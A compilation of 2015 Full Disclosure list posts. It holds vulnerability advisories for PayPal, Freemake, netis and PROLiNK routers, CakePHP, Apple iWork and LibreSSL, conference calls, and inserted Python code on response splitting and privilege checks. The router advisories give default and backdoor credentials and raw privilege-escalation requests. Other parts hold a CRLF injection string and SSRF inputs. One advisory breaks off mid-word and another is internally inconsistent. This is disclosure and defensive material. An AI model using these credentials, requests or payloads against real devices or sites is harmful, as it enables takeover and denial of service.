[FD] PayPal Inc Bug Bounty #117 - Session Fixation Vulnerability
Document Title:
PayPal Inc Bug Bounty #117 - Session Fixation Vulnerability

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1509
EIBBP-31983 (P2)
Video: http://www.vulnerability-lab.com/get_content.php?id=1615
Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/10/09/paypal-inc-bug-bounty-117-filter-bypass-remote-session-fixation-vulnerability

Release Date:
2015-10-09

Vulnerability Laboratory ID (VL-ID):
1509

Common Vulnerability Scoring System:
4.3

Product & Service Introduction:
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]

Abstract Advisory Information:
The Vulnerability Laboratory Core Research Team discovered a session fixation web vulnerability in the official PayPal Inc (France) online service web-application.

Vulnerability Disclosure Timeline:
2015-06-06: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH)
2015-06-08: Vendor Notification (PayPal Inc - Security & Bug Bounty Team)
2015-07-04: Vendor Response/Feedback (PayPal Inc - Security & Bug Bounty Team)
2015-09-30: Vendor Fix/Patch (PayPal Inc - Developer Team)
2015-10-08: Security Reward (PayPal Inc - Bug Bounty Team) [3.000$]
2015-10-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
Published

Affected Product(s):
PayPal Inc
Product: PayPal - Online Service Web Application 2015 Q2

Exploitation Technique:
Remote

Severity Level:
Medium

Technical Details & Description:
A session fixation web vulnerability has been discovered in the official PayPal Inc online service web-application. The vulnerability allows remote attackers to manipulate user session information to take over the data for malicious purposes.

Data enters a web application through an untrusted source, most frequently an HTTP request. The data is included in an HTTP response header sent to a web user without being validated for malicious characters.

HTTP response splitting is a means to an end, not an end in itself. At its root, the attack is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header. To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) characters into the header AND the underlying platform must be vulnerable to the injection of such characters. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control. On th
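As an added illustration (not part of the advisory), the following Python models a handler that copies a request parameter into a Set-Cookie header, a lenient parser that shows how a CR/LF pair in that value turns one response into two, and the decoded-value check that prevents it. The parameter name "lang", the handler and the test value are constructed.

```python
"""Constructed example of HTTP response splitting and its mitigation.
Assumed scenario: a handler copies the request parameter "lang" into a
Set-Cookie header after URL-decoding it.  Nothing here is real server code."""
from urllib.parse import unquote

CRLF = "\r\n"


def build_response_unsafe(lang: str) -> bytes:
    """Vulnerable pattern: the decoded parameter is concatenated into a header
    with no check for CR/LF, which is the defect the advisory describes."""
    headers = [
        "HTTP/1.1 200 OK",
        f"Set-Cookie: lang={lang}",
        "Content-Type: text/html",
        "Content-Length: 2",
    ]
    return (CRLF.join(headers) + CRLF + CRLF + "ok").encode("latin-1")


def sanitize_header_value(value: str) -> str:
    """Reject anything that could end the current header line or the header
    block.  The check must run on the *decoded* value: %0d / %0a only become
    CR / LF after the framework URL-decodes the parameter."""
    if "\r" in value or "\n" in value or "\x00" in value:
        raise ValueError("CR, LF and NUL are not allowed in header values")
    return value


def build_response_safe(lang: str) -> bytes:
    """Hardened handler: same output, but the value is validated first."""
    return build_response_unsafe(sanitize_header_value(lang))


def header_value_is_safe(value: str) -> bool:
    try:
        sanitize_header_value(value)
        return True
    except ValueError:
        return False


def split_responses(stream: bytes) -> list:
    """Parse a byte stream the way a lenient proxy or browser would: a status
    line, header lines up to a blank line, then Content-Length body bytes.
    Returns one dict per message found; an injected second message shows up."""
    messages, pos = [], 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, val = line.partition(":")
            headers[name.strip().lower()] = val.strip()
        body_len = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        messages.append({
            "status": lines[0],
            "headers": headers,
            "body": stream[body_start:body_start + body_len],
        })
        pos = body_start + body_len
    return messages


# Constructed test value, written URL-encoded as it would travel in a query
# string: %0d%0a is the CR LF pair the advisory refers to.
INJECTED = unquote(
    "en%0d%0aContent-Length%3a%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type%3a%20text/html%0d%0a"
    "Content-Length%3a%208%0d%0a%0d%0ainjected"
)

if __name__ == "__main__":
    print("plain value ->", len(split_responses(build_response_unsafe("en"))), "message(s)")
    print("CRLF value  ->", len(split_responses(build_response_unsafe(INJECTED))), "message(s)")
    print("sanitizer accepts CRLF value:", header_value_is_safe(INJECTED))
```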
[FD] Freemake Video Downloader 3.7.1 - Code Execution Vulnerability
Document Title:
Freemake Video Downloader 3.7.1 - Code Execution Vulnerability

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1617

Release Date:
2015-10-12

Vulnerability Laboratory ID (VL-ID):
1617

Common Vulnerability Scoring System:
8.8

Product & Service Introduction:
Freemake YouTube Downloader is free software to download online videos to a PC free and fast. Download videos from YouTube, Facebook, Dailymotion, Vevo, Vimeo, and 10,000+ sites. You can grab any streaming video in original quality or convert it to MP3, AVI, MKV, WMV, 3GP, or for iPhone, iPod, PSP, Android. Easy setup, no fees, no signup, no limitations.

(Copy of the Vendor Homepage: http://www.freemake.com/free_video_downloader/ )

Abstract Advisory Information:
An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official FreemakeVideoDownloader v3.7.1 software.

Vulnerability Disclosure Timeline:
2015-10-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
Published

Affected Product(s):
Freemake
Product: Freemake Video Downloader - Software (Windows) 3.7.1

Exploitation Technique:
Local

Severity Level:
High

Technical Details & Description:
A code execution web vulnerability has been discovered in the official FreemakeVideo Converter v4.1.7 software. The vulnerability allows an attacker to execute malicious code by interaction with a vulnerable software input field.

The security vulnerability is present in the `paste url` module of the software. The download module does not filter the file type .php and thus finally allows an attacker to execute for example the calculator. The vulnerability can be exploited by local attackers without interaction. The severity of the issue is high and the bug can be exploited because of a misconfigured file validation mechanism.

The security risk of the code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.8. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the software vulnerability results in system compromise by a classic url code execution.

Vulnerable Module(s):
[+] Download

Vulnerable Input(s):
[+] paste url

Affected Module(s):
[+] .php

Proof of Concept (PoC):
The code execution vulnerability can be exploited by local attackers with a restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Launch your browser and paste your malicious link in your url input field (Do not process to open your link yet!)
2. Run Freemake VideoDownloader.exe
3. Click paste url
4. The php code executes successfully after usage of the url paste
5. Successful reproduction of the code execution vulnerability!

PoC: Exploit

Security Risk:
The security risk of the code execution web vulnerability in the software core is estimated as high. (CVSS 8.8)

Credits & Authors:
ZwX - (http://zwx.fr) [ http://www.vulnerability-lab.com/show.php?user=ZwX ]

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: ad...@vulnerability-lab.com - resea...@vulnerability-lab.com - ad...@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab
[FD] Unicorn CPU Emulator Framework is out!
Greetings,

Two months after our Blackhat USA talk, we are excited to announce the first release, version 0.9, of Unicorn Engine, the multi-arch, multi-platform CPU emulator framework you are all longing for!

Unicorn CPU emulator offers some unparalleled features:

- Multi-architectures: Arm, Arm64 (Armv8), M68K, Mips, PowerPC, Sparc, & X86 (include X86_64).
- Clean/simple/lightweight/intuitive architecture-neutral API.
- Implemented in pure C language, with bindings for Python, Java, Go & .NET available.
- Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed).
- High performance by using Just-In-Time compiler technique.
- Support fine-grained instrumentation at various levels.
- Thread-safe by design.
- Distributed under open source license GPL.

For further information, see our website at http://www.unicorn-engine.org

Unicorn is a very young project, but we do hope that it will live a long life. The community support will be critical for this little open source framework!

We would like to show our gratitude to the beta testers for bug reports & code contributions during the beta phase! Their invaluable help has been tremendous in getting us this far.

Huge thanks go to the QEMU project, which Unicorn is based on, and extends much further in its special area. Without the almighty QEMU, Unicorn would not exist!

Our engine aims to lay the ground for innovative works. We look forward to seeing much advanced research & development in the security area built on this framework.

Let the fun begin!

Thanks,
Quynh

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] hackercon berlin: hack4 the year is 2015
Hi folks and gentlehackers,

as this year is almost over, what could be nicer than spending some time in Berlin and listening to the packets? We are happy to announce the 2015 hack4 in Berlin.

What are we looking for? Basically practical technical talks and cool people.

Topics we want to cover:
* Malware Coding (elf / pe)
* Distributed Networks
* Sort of exploitation (stack/heap/win/*nix)
* Database tricks (e.g. mysql/postgres/oracle pwnage)
* Neat language intros (preferred python, c, assembly ;))
* Rootkits (userland, kernelland...bios)
* Bughunting
* Debugger/disassembler usage (gdb, ollydb, ida)
* You name it!

When? 28.12.2015 - 29.12.2015
Where? Berlin
Location? Tba

You want to join? regis...@hack4.org
You want to do a talk? ta...@hack4.org
You want to help and keep the con going? h...@hack4.org

Con website: http://www.hack4.org

ch33rs
dash
[FD] netis RealTek wireless router / ADSL modem Multiple Vulnerabilities
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?]
# Vendor Homepage: [www.netis-systems.com]
# Version Affected: [Firmware version RTK v2.1.1]

**Vulnerability Details**

1. *Default, weak passwords for http and ftp services*

a. *HTTP accounts*
- guest/guest
- user/user
- guest/airocon*
  * -> last four digits of MAC address

b. *FTP accounts*
- admin/admin
- useradmin/useradmin
- user/user

2. *Backdoor accounts*

The device comes configured with a privileged backdoor account. For HTTP, 'guest' with attribute , is the backdoor account. This is seen in the config file:

This user is not shown / visible in the user list when logged in as guest (privileged user).

3. *No CSRF protection*

There is no CSRF token set in any of the forms / pages. It is possible to silently execute HTTP requests if the user is logged in.

4. *Weak RBAC controls*

5a) *A non-root/non-admin user (user) can create and delete any other users, including root-privileged accounts.*

In the netis RealTek wireless router ADSL modem, there are three users:
guest:guest -> priv 2 is the super user account with full functional access
user:user -> priv 0 -> can access only some functions
guest:airocon -> privileged backdoor login

*Normally:*
- user can create a new account with restricted user privs only.
- user can change its own password and only those of other non-root users.
- user can delete any other non-root users.

However, the application does not enforce strict rbac and it is possible for a non-root user to create a new user with root privileges. This is done as follows:

1. Start creating a new user, and intercept the user creation POST request
2. Intercept & change the privilege parameter value from 0 (user) to 2 (root) - submit the request
3. When the new root user is created successfully, it does not show up in the user list
4. Confirm via logging in as the new root, and / or the configured accounts in the configuration file (config.img)

This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=

*Note1*: In some cases, this password change function is not accessible to 'user' via the GUI. But we can still send a POST request to create a valid, new root privileged account.

*Note2*: In some cases, the application does not create the root priv user in the first attempt. However, in the 2nd or 3rd attempt, the new user is created without any issue.

*Delete user http request:*

A non-root/non-admin user can delete any configured user(s) including privileged users (guest).

POST /form2userconfig.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%

In case the (non-root) user is deleting a root login (guest, priv 2), the action status can be confirmed by checking the configuration. In case the (non-root) user is deleting a user login (priv 0), the action status can be confirmed by checking the user list.

5b) *(non-root priv) User can access unauthorized functions.*

Normally, 'user' does not have access to all the functionality of the device. It has access to Status, Setup and Maintenance. However, a few functions can still be accessed by calling them directly. For example, to access the mac filtering configuration this url can be opened directly:

http:///fw-macfilter.htm

Other functions may also be accessible in this manner.

6. *Sensitive information not secured from low privileged users*

A non-root / non-admin privileged user has access to download the configuration file - config.img. This file contains clear-text passwords, keys and other sensitive information which can be used to gain privileged access.

7. *Sensitive information accessible in clear-text*

Sensitive information like passwords and keys is not secured properly. Mostly these are either shown in clear-text or, when censored with *, it is possible to view the clear-text values by 'Inspect Element' locally, by intercepting http requests, or by sniffing.

--
[FD] PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities
# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [No process to handle vuln reports]
# Vendor Homepage: [ http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]

**Vulnerability Details**

1. *Default, weak passwords for http and ftp services*

a. *HTTP accounts*
- admin/password
- user/user
- guest/airocon*
  * -> last four digits of MAC address

b. *FTP accounts*
- admin/admin
- useradmin/useradmin
- user/user

2. *Backdoor accounts*

The device comes configured with a privileged backdoor account. For HTTP, 'guest' with attribute , is the backdoor account. This is seen in the config file:

This user is not shown / visible in the user list when logged in as admin (privileged user).

3. *No CSRF protection*

There is no CSRF token set in any of the forms / pages. It is possible to silently execute HTTP requests if the user is logged in.

4. *Weak RBAC controls*

5a) *A non-admin user (user) can create and delete any other users, including root-privileged accounts.*

There are three users:
admin:password -> priv 2 is the super user account with full functional access (admin/root)
user:user -> priv 0 -> can access only some functions (user)
guest:airocon -> privileged backdoor login

*Normally:*
- user can create a new account with restricted user privs only.
- user can change its own password and only those of other non-admin users.
- user can delete any other non-admin users.

However, the application does not enforce strict rbac and it is possible for a non-admin user to create a new account with admin privileges. This is done as follows:

1. Start creating a new user, and intercept the user creation POST request
2. Intercept & change the privilege parameter value from 0 (user) to 2 (admin) - submit the request
3. When the new admin user is created successfully, it does not show up in the user list
4. Confirm via logging in as the new admin, and / or the configured accounts in the configuration file (config.img)

This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=

*Note1*: In some cases, this password change function is not accessible to 'user' via the GUI. But we can still send a POST request to create a valid, new higher privileged account.

*Note2*: In some cases, the application does not create the admin priv user in the first attempt. However, in the 2nd or 3rd attempt, the new user is created without any issue.

*Delete user http request:*

A non-admin user can delete any configured user(s) including privileged users (admin).

POST /form2userconfig.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http:///userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%

In case the (non-admin) user is deleting the admin login (priv 2), the action status can be confirmed by checking the configuration. In case the (non-admin) user is deleting another user login (priv 0), the action status can be confirmed by checking the user list.

5b) *(non-admin priv) User can access unauthorized functions.*

Normally, 'user' does not have access to all the functionality of the device. It has access to Status, Setup and Maintenance. However, a few functions can still be accessed by calling them directly. For example, to access the mac filtering configuration this url can be opened directly:

http:///fw-macfilter.htm

Other functions may also be accessible in this manner.

6. *Sensitive information not secured from low privileged users*

A non-admin privileged user has access to download the configuration file - config.img. This file contains clear-text passwords, keys and other sensitive information which can be used to gain privileged access.

7. *Sensitive information accessible in clear-text*

Sensitive information like passwords and keys is not secured properly. Mostly these are either shown in clear-text or, when censored with *, it is possible to view the clear-text values by 'Inspect Element' locally or intercepting
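The two advisories above (netis and PROLiNK) describe the same missing server-side check on form2userconfig.cgi. As an added example, not the vendors' firmware code, the following Python shows what the endpoint should enforce: the privilege value in the form is compared with the privilege of the session that submits it, and an audit helper surfaces accounts that exist in the configuration but are hidden from the user list. The in-memory account table, the session model and the policy wording are assumptions; the create request body is the one quoted in the advisories.

```python
"""Server-side enforcement for a user-management endpoint shaped like
form2userconfig.cgi (constructed example, not the vendors' firmware).
Privilege levels follow the advisories: 2 = root/admin, 0 = user.  The
account store, the session model and the policy wording are assumptions."""
from urllib.parse import parse_qs

ROOT, USER = 2, 0


class Forbidden(Exception):
    pass


def parse_form(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def handle_userconfig(session_user: str, body: str, users: dict) -> dict:
    """users maps name -> {"priv": int, "pass": str}.  The privilege value the
    client sends is never trusted on its own: it is compared with the privilege
    of the account behind the session that submits the form, which is the check
    the advisories show to be missing."""
    if session_user not in users:
        raise Forbidden("no valid session")
    caller_priv = users[session_user]["priv"]
    form = parse_form(body)
    name = form.get("username", "")

    if "adduser" in form:
        try:
            requested = int(form.get("privilege", str(USER)))
        except ValueError:
            raise Forbidden("privilege is not a number")
        if requested not in (USER, ROOT):
            raise Forbidden("unknown privilege level")
        if requested > caller_priv:            # blocks the 0 -> 2 tampering in 5a)
            raise Forbidden("cannot grant more privilege than the caller holds")
        if not name or name in users:
            raise Forbidden("missing or duplicate username")
        if not form.get("newpass") or form.get("newpass") != form.get("confpass"):
            raise Forbidden("password confirmation mismatch")
        users[name] = {"priv": requested, "pass": form["newpass"]}
        return {"action": "add", "user": name, "priv": requested}

    if "deluser" in form:
        if name not in users:
            raise Forbidden("no such user")
        if name == session_user:
            raise Forbidden("cannot delete the account of the current session")
        if users[name]["priv"] >= ROOT and caller_priv < ROOT:   # delete case of 5a)
            raise Forbidden("only root may delete root accounts")
        del users[name]
        return {"action": "delete", "user": name}

    raise Forbidden("unknown action")


def attempt(session_user: str, body: str, users: dict) -> str:
    """Convenience wrapper returning 'ok' or the refusal reason."""
    try:
        handle_userconfig(session_user, body, users)
        return "ok"
    except Forbidden as exc:
        return f"forbidden: {exc}"


def hidden_accounts(config_accounts: list, listed_accounts: list) -> list:
    """Accounts present in the exported configuration (config.img) but absent
    from the user list the web UI shows.  Both advisories describe exactly such
    an invisible privileged login; this audit exposes it."""
    return sorted(set(config_accounts) - set(listed_accounts))


# Form bodies: the first is the create request quoted in the advisories, the
# second is a delete request constructed in the same shape.
CREATE_ROOT_BODY = ("username=test&privilege=2&newpass=test&confpass=test"
                    "&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=")
DELETE_GUEST_BODY = ("username=guest&privilege=2&oldpass=&newpass=&confpass="
                     "&deluser=Delete&select=s3&hiddenpass=test")


def fresh_store() -> dict:
    """Constructed account table mirroring the netis defaults in the advisory."""
    return {"guest": {"priv": ROOT, "pass": "guest"},
            "user": {"priv": USER, "pass": "user"}}


if __name__ == "__main__":
    store = fresh_store()
    print("user creates root  :", attempt("user", CREATE_ROOT_BODY, store))
    print("guest creates root :", attempt("guest", CREATE_ROOT_BODY, store))
    print("user deletes guest :", attempt("user", DELETE_GUEST_BODY, store))
    print("hidden accounts    :", hidden_accounts(["guest", "user", "test"], ["guest", "user"]))
```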
[FD] UISGCON11 CFP
Hello

On behalf of the UISGCON11 Organization Committee I would like to invite all persons who want to participate in our annual Ukrainian InfoSec conference; the CFP is open for submission.

UISGCON11 will be held on December 4 in Kyiv, Ukraine, Hotel Bratislava.

Website of the event - https://11.uisgcon.org/en

To submit the paper, please fill in the form at https://11.uisgcon.org/en/call-papers or e-mail directly to ta...@uisgcon.org.

Annual conferences of the Ukrainian Information Security Group gather in Kyiv, the capital of Ukraine, hundreds of Ukrainian and international experts in information security to discuss the most acute problems of the industry. As you know, one of the most relevant challenges of the present is the information war against Ukraine's aspirations for freedom and independence. This war is happening not only in social networks and on TV, but also in telecommunication networks and the cyber-environment. These and many other topics will be discussed by recognized gurus and students, journalists and hackers, CTO/CISO and system administrators.

Please take part in the biggest information security conference in Ukraine and be a speaker of UISGCON.

See you soon!

--
Thank you,
Andrey Loginov
UISGCON11 Coordinator
[FD] CakePHP Xml class SSRF Vulnerability
Title : CakePHP Xml class SSRF Vulnerability
CVE Number : N/A (not assigned)
Affected Software : Confirmed on CakePHP v3.0.5 (prior versions may also be affected)
Credit : Takeshi Terada of Mitsui Bussan Secure Directions, Inc. http://www.mbsd.jp/
Issue Status : v3.0.6/2.6.6 was released which fixes this issue

Overview:
CakePHP is an open-source web application framework for PHP. CakePHP (v3.0.5) was confirmed to be vulnerable to SSRF (Server Side Request Forgery) attacks. A remote attacker can utilize it for at least DoS (Denial of Service) attacks, if the target application accepts XML as an input. It is caused by the insecure design of Cake's Xml class.

Details:
Here is an abstract from Cake\Utility\Xml.php (v3.0.3).

 96: public static function build($input, array $options = [])
 97: {
104:     if (is_array($input) || is_object($input)) {
105:         return static::fromArray($input, $options);
106:     }
107:
108:     if (strpos($input, '<') !== false) {
109:         return static::_loadXml($input, $options);
110:     }
111:
112:     if (file_exists($input)) {
113:         return static::_loadXml(file_get_contents($input), $options);
114:     }

The problematic part is lines 112-114, where $input is treated as a URL (file path) and the method tries to fetch the content of the URL, if it does not contain any '<' character. Therefore, if values such as those shown below are given to it, the application will block.

1. file:///dev/random -> blocks permanently (until so much entropy is supplied)
2. /dev/urandom -> blocks until hitting the memory limit
3. ftp://very_slow_host/a -> blocks until the socket timeout

Attackers can exhaust MaxClients (on Apache), just by sending a number of requests with these values instead of normal XML.

CakePHP seems to accept XML inputs when RequestHandlerComponent, which is designed to handle XHR requests that may contain XML or JSON in their body, is enabled.

http://book.cakephp.org/3.0/en/development/rest.html
http://book.cakephp.org/3.0/en/controllers/components/request-handling.html

When the component is enabled and a request has the necessary headers (Content-Type and X-Requested-With), the raw body of the request is passed to Xml::build() directly (i.e. without validation), which can obviously be used for attacks.

However, it seems hard to successfully conduct other types of attack than DoS, because there are some hurdles for attackers. Firstly, usual web applications are unlikely to return the full request data. This means there is very little opportunity for file theft attacks, regardless of whether the target file is XML or not. The second hurdle is the file_exists() check in line 112, which results in URLs with interesting schemes like "expect" and "http" being rejected. But still DoS and timing attacks like internal network scans using ftp URLs are possible. Additionally, in CakePHP v2, attackers can also use http(s) URLs for such attacks, as Cake2 accepts URLs with these schemes.

Timeline:
2015/05/27 Reported to CakePHP Security ML
2015/05/29 Vendor announced v3.0.6 & 2.6.6
2015/10/15 Disclosure of this advisory

Recommendation:
Upgrading to the latest versions is recommended, if your app accepts XML data, as stated in the release note.

https://github.com/cakephp/cakephp/releases/tag/3.0.6

One thing I think should be noted is that the default behavior of the method (Xml::build()) was kept as it had been, in order to avoid compatibility problems.

https://github.com/cakephp/cakephp/commit/2cde19f24c3679e8162e3abbce73818a8b0c02a0

This means you need to modify your program, if you pass untrusted data to the method in your own program code to deal with XML. Technically, specifying a newly created option (readFile = false) for the method disables the URL loading feature, and thus can prevent DoS and other relevant attacks. See the URL above (github commit log) for details.

--
Takeshi Terada
Mitsui Bussan Secure Directions, Inc.
http://www.mbsd.jp/
[FD] APPLE-SA-2015-10-15-1 Keynote 6.6, Pages 5.6, Numbers 3.6, and iWork for iOS 2.6
APPLE-SA-2015-10-15-1 Keynote 6.6, Pages 5.6, Numbers 3.6, and iWork for iOS 2.6

Keynote 6.6, Pages 5.6, Numbers 3.6, and iWork for iOS 2.6 are now available which address the following:

Keynote, Pages, and Numbers
Available for: OS X Yosemite v10.10.4 or later, iOS 8.4 or later
Impact: Opening a maliciously crafted document may lead to compromise of user information
Description: Multiple input validation issues existed in parsing a maliciously crafted document. These issues were addressed through improved input validation.
CVE-ID
CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.
CVE-2015-7032 : Behrouz Sadeghipour (@Nahamsec) and Patrik Fehrenbach (@ITSecurityguard)

Keynote, Pages, and Numbers
Available for: OS X Yosemite v10.10.4 or later, iOS 8.4 or later
Impact: Opening a maliciously crafted document may lead to unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing a maliciously crafted document. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7033 : Felix Groebert of the Google Security Team

Pages
Available for: OS X Yosemite v10.10.4 or later, iOS 8.4 or later
Impact: Opening a maliciously crafted Pages document may lead to unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing a maliciously crafted Pages document. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7034 : Felix Groebert of the Google Security Team

Keynote 6.6, Pages 5.6, Numbers 3.6, and iWork for iOS 2.6 may be obtained from the App Store.
Information will also be posted to the Apple Security Updates web site:
http://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key, and details are available at:
https://www.apple.com/support/security/pgp/
Re: [FD] Watch your Downloads: the risk of the "auto-download" feature on Microsoft Edge and Google Chrome
On Mon, Oct 12, 2015 at 7:20 AM, Stefan Kanthak wrote:
>
>
> Right.
> And that's why it's ABSOLUTELY necessary to educate EVERY Windows user:

Any solution that requires personally talking to 7 billion people and achieving 100% understanding and compliance is not even in theory workable.

Oops, 7 billion and one; they made another one while I was typing this.

Oops, 7 billion and two; they made another one while you were reading it.

This has to be fixed in the OS.
[FD] Qualys Security Advisory - LibreSSL (CVE-2015-5333 and CVE-2015-5334)
Qualys Security Advisory

LibreSSL (CVE-2015-5333 and CVE-2015-5334)

Contents

Summary
Memory Leak (CVE-2015-5333)
Buffer Overflow (CVE-2015-5334)
Acknowledgments

Summary

In order to achieve remote code execution against the vulnerabilities that we recently discovered in OpenSMTPD (CVE-2015-7687), a memory leak is needed. Because we could not find one in OpenSMTPD itself, we started to review the malloc()s and free()s of its libraries, and eventually found a memory leak in LibreSSL's OBJ_obj2txt() function; we then realized that this function also contains a buffer overflow (an off-by-one, usually stack-based).

The vulnerable function OBJ_obj2txt() is reachable through X509_NAME_oneline() and d2i_X509(), which is called automatically to decode the X.509 certificates exchanged during an SSL handshake (both client-side, unless an anonymous mode is used, and server-side, if client authentication is requested).

These vulnerabilities affect all LibreSSL versions, including LibreSSL 2.0.0 (the first public release) and LibreSSL 2.3.0 (the latest release at the time of writing). OpenSSL is not affected.

Memory Leak (CVE-2015-5333)

OBJ_obj2txt() converts an ASN.1 object identifier (the ASN1_OBJECT a) into a null-terminated string of numerical subidentifiers separated by dots (at most buf_len bytes are written to buf). Large subidentifiers are temporarily stored in a BIGNUM (bl) and converted by BN_bn2dec() into a printable string of decimal characters (bndec).

Many such bndec strings can be malloc()ated and memory-leaked in a loop, because only the last one will be free()d, after the end of the loop:

489 int
490 OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name)
491 {
...
494     char *bndec = NULL;
...
516     len = a->length;
...
519     while (len > 0) {
...
570         bndec = BN_bn2dec(bl);
571         if (!bndec)
572             goto err;
573         i = snprintf(buf, buf_len, ".%s", bndec);
...
598     }
...
601     free(bndec);
...
609 }

